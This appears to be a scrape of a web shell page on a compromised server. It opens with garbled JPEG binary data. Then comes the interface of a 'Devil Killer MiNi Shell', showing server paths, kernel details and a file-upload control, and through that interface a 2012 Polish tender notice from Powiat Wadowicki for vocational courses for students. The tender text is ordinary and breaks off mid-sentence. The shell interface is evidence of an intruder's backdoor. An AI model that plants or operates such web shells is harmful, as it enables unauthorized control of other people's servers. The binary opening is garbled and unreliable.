JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/393020-N-2012.html

<p class="kh_header"><b>Wadowice: Organizacja i przeprowadzenie  kursów zawodowych: kursu do obsługi i konserwacji urządzeń elektrycznych do 1 kV - kwalifikacje SEP, kursu kosztorysowania dla uczniów szkół ponadgimnazjalnych Powiatu Wadowickiego w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce wg 2 zadań</b><br>
<b>Numer ogłoszenia: 393020 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wadowicki , ul. Batorego 2, 34-100 Wadowice, woj. małopolskie, tel. 033 8734200, faks 033 8232433.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.wadowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie  kursów zawodowych: kursu do obsługi i konserwacji urządzeń elektrycznych do 1 kV - kwalifikacje SEP, kursu kosztorysowania dla uczniów szkół ponadgimnazjalnych Powiatu Wadowickiego w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce wg 2 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce:
- obsługi i konserwacji urządzeń elektrycznych do 1 kV -kwalifikacje SEP dla 15 uczniów Zespołu Szkół nr 1 w Andrychowie oraz dla 10 uczniów Zespołu Szkół nr 2 w Wadowicach,
- kosztorysowania budowlanego dla 10 uczniów Zespołu Szkół nr 1 w Wadowicach, ul. Słowackiego 4, 34-100 Wadowice.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku udziału w postępowaniu dokonywana będzie metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (do każdego zadania oddzielnie) wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. 
Ocena spełnienia powyższego warunku udziału w postępowaniu dokonywana będzie metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku udziału w postępowaniu dokonywana będzie metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadających wymagane uprawnienia zawodowe do wykonywania powyższych prac (do każdego zadania oddzielnie). 
Ocena spełnienia powyższego warunku udziału w postępowaniu dokonywana będzie metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku udziału w postępowaniu dokonywana będzie metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przez okoliczności siły wyższej strony rozumieją zdarzenie zewnętrzne o charakterze nadzwyczajnym, którego nie można było przewidzieć ani jemu zapobiec.
2. Jeżeli wskutek okoliczności siły wyższej Strona nie będzie mogła wykonywać swoich obowiązków umownych w całości lub w części, niezwłocznie powiadomi o tym drugą stronę. W takim przypadku Strony uzgodnią sposób i zasady dalszego wykonywania umowy lub umowa zostanie rozwiązana</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.wadowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wadowicach ul. Batorego 2 34-100 Wadowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 10:30, miejsce: Starostwo Powiatowe w Wadowicach
ul. Batorego 2, sekretariat pok. 314 (III piętro)
34-100 Wadowice..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu do obsługi i konserwacji urządzeń elektrycznych do 1 kV -kwalifikacje SEP dla 15 uczniów Zespołu Szkół nr 1 w Andrychowie oraz dla 10 uczniów Zespołu Szkół nr 2 w Wadowicach w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest przygotowanie teoretyczne i praktyczne uczniów do egzaminu państwowego w celu uzyskania świadectwa kwalifikacyjnego - uprawnienia SEP G-1E na stanowisku eksploatacji w zakresie obsługi i konserwacji urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym, niż 1 kV, sieci elektrycznego oświetlenia ulicznego, aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji, sterowania i zabezpieczeń urządzeń i  instalacji wyżej wymienionych. 
Miejsce przeprowadzenia kursu: 
Kurs dla uczniów Zespołu Szkół nr 2 w Wadowicach może zostać zorganizowany w siedzibie Zespołu Szkół nr 2 w Wadowicach, ul. Zegadłowicza 36, 34-100 Wadowice, a dla uczniów Zespołu Szkół nr 1 w Andrychowie w siedzibie Zespołu Szkół nr 1 w Andrychowie, ul. Starowiejska 22 a, 34-120 Andrychów, pod warunkiem, że Wykonawca zapewni niezbędny sprzęt i urządzenia w celu prawidłowej realizacji kursu. Dopuszcza się możliwość organizacji kursu w miejscu wskazanym przez Wykonawcę. Wykonawca zapewnia wówczas każdorazowo wszystkim uczestnikom bezpłatny transport spod siedziby ZS nr 2 w Wadowicach oraz ZS nr 1 w Andrychowie do miejsca odbywania kursu i z powrotem oraz opiekę w trakcie dowożenia i odwożenia uczestników kursu, w tym ubezpieczenie uczestników. Wykonawca ponosi koszty związane z opłatami drogowymi, np. na autostradach, parkingach itp. 
W przypadku organizacji kursu w budynkach Zespołu Szkół nr 2 w Wadowicach oraz Zespołu Szkół nr 1 w Andrychowie Wykonawca nie ponosi kosztów wynajęcia sali. 
Zakres programowy szkolenia 
Liczba godzin kursu powinna obejmować co najmniej 50 godzin zajęć (praktycznych 
i teoretycznych). Godzina zajęć teoretycznych obejmuje 45 minut zajęć, natomiast godzina zajęć praktycznych obejmuje 60 minut zajęć. Długość przerw jest ustalana w sposób elastyczny przez Wykonawcę. Zajęcia mogą odbywać się codziennie od poniedziałku do piątku lub w weekendy, po wcześniejszym ustaleniu terminu z liderem szkolnym. Wykonawca po podpisaniu umowy (podpisanie umowy następuje w siedzibie Zamawiającego), przed realizacją kursu, co najmniej na 5 dni przed rozpoczęciem kursu ma obowiązek dostarczyć do Zamawiającego szczegółowy harmonogram kursu (terminy realizacji zajęć, tematyka zajęć, godziny) który powinien zostać uzgodniony z liderem szkolnym projektu. Miejsca, wyposażenie i sprzęt wykorzystywane 
do realizacji kursu muszą odpowiadać wymaganiom zgodnie z obowiązującymi przepisami prawa dotyczącymi realizacji przedmiotowego kursu zarówno w części teoretycznej jak i praktycznej. 
Wykonawca zobowiązany jest do pokrycia kosztów związanych z realizacją kursu 
tj. w szczególności do : 
- organizacji  kursu - zajęć teoretycznych i praktycznych,
- ubezpieczenia uczestników kursu w niezbędnym zakresie (ubezpieczenie obejmuje wypadki powstałe w związku z udziałem w kursie, w drodze do miejsca odbywania kursu i z powrotem),
-przekazania materiałów szkoleniowych oraz zapewnienia niezbędnego sprzętu i urządzeń w celu realizacji zajęć praktycznych,
- realizacji kursu przez wykwalifikowanych wykładowców i instruktorów, posiadających 
doświadczenie w prowadzeniu kursu,
-zorganizowania  i przeprowadzenia egzaminu kwalifikacyjnego przed komisją kwalifikacyjną powołaną zgodnie z rozporządzeniem  Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. Nr 89,poz. 828 z późn. zm.) w tym również dokonania formalności związanych z ustaleniem terminu egzaminu, zapisami na egzamin, uiszczeniem opłaty oraz  złożeniem wniosku, o którym mowa w § 7 ww. rozporządzenia w imieniu uczestników kursu,
-wydania uczestnikom  kursu zaświadczeń potwierdzających ukończenie kursu oraz po zdaniu egzaminu kwalifikacyjnego świadectw kwalifikacyjnych.
Wykonawca ponosi odpowiedzialność za uczestników kursu w trakcie jego trwania, a także za ewentualne szkody, które mogą powstać w związku z ich udziałem w kursie. Wykonawca zapewni uczestnikom kursu w każdy dzień ich odbywania bezpłatny catering w postaci serwisu kawowego (kawa, herbata, ciastka, woda mineralna). 
Kurs zakończy się uzyskaniem przez uczestników zaświadczeń potwierdzających ukończenie kursu oraz przeprowadzeniem egzaminu kwalifikacyjnego dającego możliwość uzyskania przez uczestników świadectw kwalifikacyjnych dających uprawnienia państwowe w zakresie urządzeń, instalacji i sieci elektroenergetycznych, wytwarzających, przetwarzających, przesyłających i zużywających energię elektryczną przy których eksploatacji wymagane jest posiadanie kwalifikacji, a określonych poniżej:
a) urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV;
b) sieci elektrycznego oświetlenia ulicznego,
Zaświadczenie o ukończeniu kursu powinno zawierać  logotypy Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej- Europejski Fundusz Społeczny (UE EFS),Województwa Małopolskiego, Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
W przypadku braku możliwości umieszczenia ww. logotypów na zaświadczeniu, konieczne jest wydanie certyfikatów do każdego zaświadczenia zawierających ww. informacje. 
W ramach promocji projektu Wykonawca umieści w miejscu realizacji kursu plakaty związane z projektem, jego nazwę wraz z logotypami. Wykonawca jest zobowiązany do przeprowadzenia wśród uczestników kursu oceny merytorycznej przebiegu kursu- ewaluacji na podstawie przeprowadzonych ankiet  na początku i na zakończenie kursu. Wyniki oceny merytorycznej przebiegu kursu- ewaluacji Wykonawca przekaże w formie  pisemnej Zamawiającemu po zakończeniu kursu.  
Wykonawca zobowiązany jest do fotograficznego udokumentowania prowadzonego kursu i dostarczenia w/w dokumentacji Zamawiającemu. 
Zgodnie z zasadami finansowania Programu Operacyjnego Kapitał Ludzki wydanymi przez Ministerstwo Rozwoju  Regionalnego, obowiązującymi od 1 stycznia 2011 r. personelem projektu nie mogą być osoby zatrudnione w Instytucjach uczestniczących  w realizacji POKL tj. Instytucji Zarządzającej, Instytucji Pośredniczącej, Instytucji Wdrażającej  (Instytucji Pośredniczącej II stopnia), Regionalnych Ośrodkach EFS , Krajowym Ośrodku EFS, Krajowej Instytucji Wspomagającej, chyba, że nie zachodzi konflikt interesów, ani podwójne finansowanie. Zatem Wykonawca oświadcza, że  od dnia podpisania umowy nie będzie zatrudniony w żadnej z ww. instytucji lub że nie będzie zachodził konflikt interesów pomiędzy zatrudnieniem w tej instytucji i zatrudnieniem przy realizacji niniejszego zamówienia oraz nie będzie miało miejsce podwójne finansowanie związane z jego zatrudnieniem. W przypadku, gdy Wykonawca będzie zatrudniony w jednej z ww. instytucji jest zobowiązany dostarczyć Zamawiającemu dokumenty potwierdzające, że nie zachodzi konflikt interesów pomiędzy zatrudnieniem w tej instytucji i zatrudnieniem przy realizacji niniejszego zamówienia oraz nie będzie miało miejsce podwójne finansowanie związane  z jego zatrudnieniem. 
Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
a/ lista obecności uczestników kursu (z własnoręcznym podpisem ucznia, z każdego dnia zajęć) na zajęciach teoretycznych i praktycznych (oryginał),
b/ dziennik zajęć (kserokopia poświadczona za zgodność z oryginałem),
c/ lista z potwierdzeniem odbioru materiałów szkoleniowych przez uczestników kursu (oryginał),
d/ karty egzaminacyjne, jeśli były sporządzone (kserokopie poświadczone za zgodność z oryginałem),
e/ lista z potwierdzeniem odbioru przez uczestników zaświadczeń o ukończeniu kursu, (oryginał),
f/ poświadczone za zgodność z oryginałem kserokopie wydanych zaświadczeń o ukończeniu kursu, 
g/ lista z potwierdzeniem odbioru przez uczestników kursu świadectw kwalifikacyjnych wydanych zgodnie z  rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. nr 89,poz. 828 z późn.zm.), (oryginał),
h/ poświadczone za zgodność z oryginałem kserokopie wydanych świadectw kwalifikacyjnych zgodnie z  rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. nr 89, poz. 828 z późn.zm.), 
i/ imienny wykaz osób, które ukończyły i które nie ukończyły kursu (oryginał), a przypadku gdy uczestnik nie ukończył kursu oświadczenie wskazujące  powód takiej sytuacji,
j/ wyniki oceny merytorycznej przebiegu kursu-ewaluacja,
k/ dokumentacja fotograficzna z przeprowadzonego kursu,
l/ lista z potwierdzeniem z każdego dnia odbioru cateringu przez uczestników kursu.
Dokumentację Wykonawca składa osobiście w Biurze Partnera Projektu w Wadowicach, ul. Batorego 2, 34-100 Wadowice. 
Program szkolenia powinien obejmować zagadnienia zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. nr 89, poz. 828 z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie  kursu  kosztorysowania budowlanego dla 10 uczniów Zespołu Szkół nr 1 w Wadowicach, ul. Słowackiego 4, 34-100 Wadowice w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników kursu do samodzielnego opracowania kosztorysów.
Kurs powinien zostać zorganizowany w siedzibie Zespołu Szkół nr 1 w Wadowicach, 
ul. Słowackiego 4, 34-100 Wadowice. Zajęcia praktyczne powinny odbywać się na kilku programach do kosztorysowania: Rodos, Norma, Zuzia. Zespół Szkół nr 1 w Wadowicach  posiada Program do kosztorysowania  ZUZIA -wersja 10. Przy realizacji zajęć kursu Zamawiający udostępni  Wykonawcy salę komputerową wraz z oprogramowaniem ZUZIA do przeprowadzenia kursu w Zespole Szkół nr 1 w Wadowicach. Do realizacji kursu na pozostałych programach: Rodos i Norma Wykonawca zapewnia sprzęt i oprogramowanie, a Zamawiający udostępnia salę lekcyjną w Zespole Szkół nr 1 w Wadowicach. Wykonawca nie ponosi kosztów wynajęcia sali. Za powierzone mienie odpowiada Wykonawca. 
Liczba godzin kursu powinna obejmować 30 godzin zajęć, w tym co najmniej 26 godzin zajęć praktycznych na komputerze. Godzina zajęć obejmuje 45 minut. Długość przerw jest ustalana w sposób elastyczny przez Wykonawcę. Zajęcia mogą odbywać się codziennie od poniedziałku do piątku lub w weekendy, po wcześniejszym ustaleniu terminu z liderem szkolnym. Wykonawca po podpisaniu umowy (podpisanie umowy następuje w siedzibie Zamawiającego), przed realizacją kursu, co najmniej na 5 dni przed rozpoczęciem kursu ma obowiązek dostarczyć do Zamawiającego szczegółowy harmonogram kursu (terminy realizacji zajęć, tematyka zajęć, godziny) który powinien zostać uzgodniony z liderem szkolnym projektu. Miejsca, wyposażenie 
i sprzęt wykorzystywane do realizacji kursu muszą odpowiadać wymaganiom zgodnie 
z obowiązującymi przepisami prawa dotyczącymi realizacji przedmiotowego kursu. Każda osoba uczestnicząca w szkoleniu musi mieć do dyspozycji jedno stanowisko komputerowe. Wykonawca przekaże każdemu uczestnikowi materiały dydaktyczne: skrypt -dostosowany do tematyki szkolenia, zestaw praktycznych ćwiczeń z programem kosztorysowym -na płycie CD.
W czasie kursu Wykonawca winien zapewnić dla uczestników tzw. serwis kawowy składający się z kawy, herbaty, wody mineralnej  lub soków, ciasteczek. W przypadku, gdy zajęcia w danym dniu będą trwały powyżej pięciu godzin zegarowych Wykonawca zapewnia ciepły posiłek. 
Wykonawca ponosi odpowiedzialność za uczestników kursu w trakcie jego trwania, 
a także za ewentualne szkody, które mogą powstać w związku z ich udziałem w kursie. 
Wykonawca zobowiązany jest do przekazania  materiałów szkoleniowych oraz zapewnienia niezbędnego sprzętu i oprogramowania w celu realizacji kursu.
Wykonawca ponosi odpowiedzialność za uczestników kursu w trakcie jego trwania, 
a także za ewentualne szkody, które mogą powstać w związku z ich udziałem w kursie. 
Zaświadczenie, certyfikaty o ukończeniu kursu powinny zawierać logotypy Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej- Europejski Fundusz Społeczny 
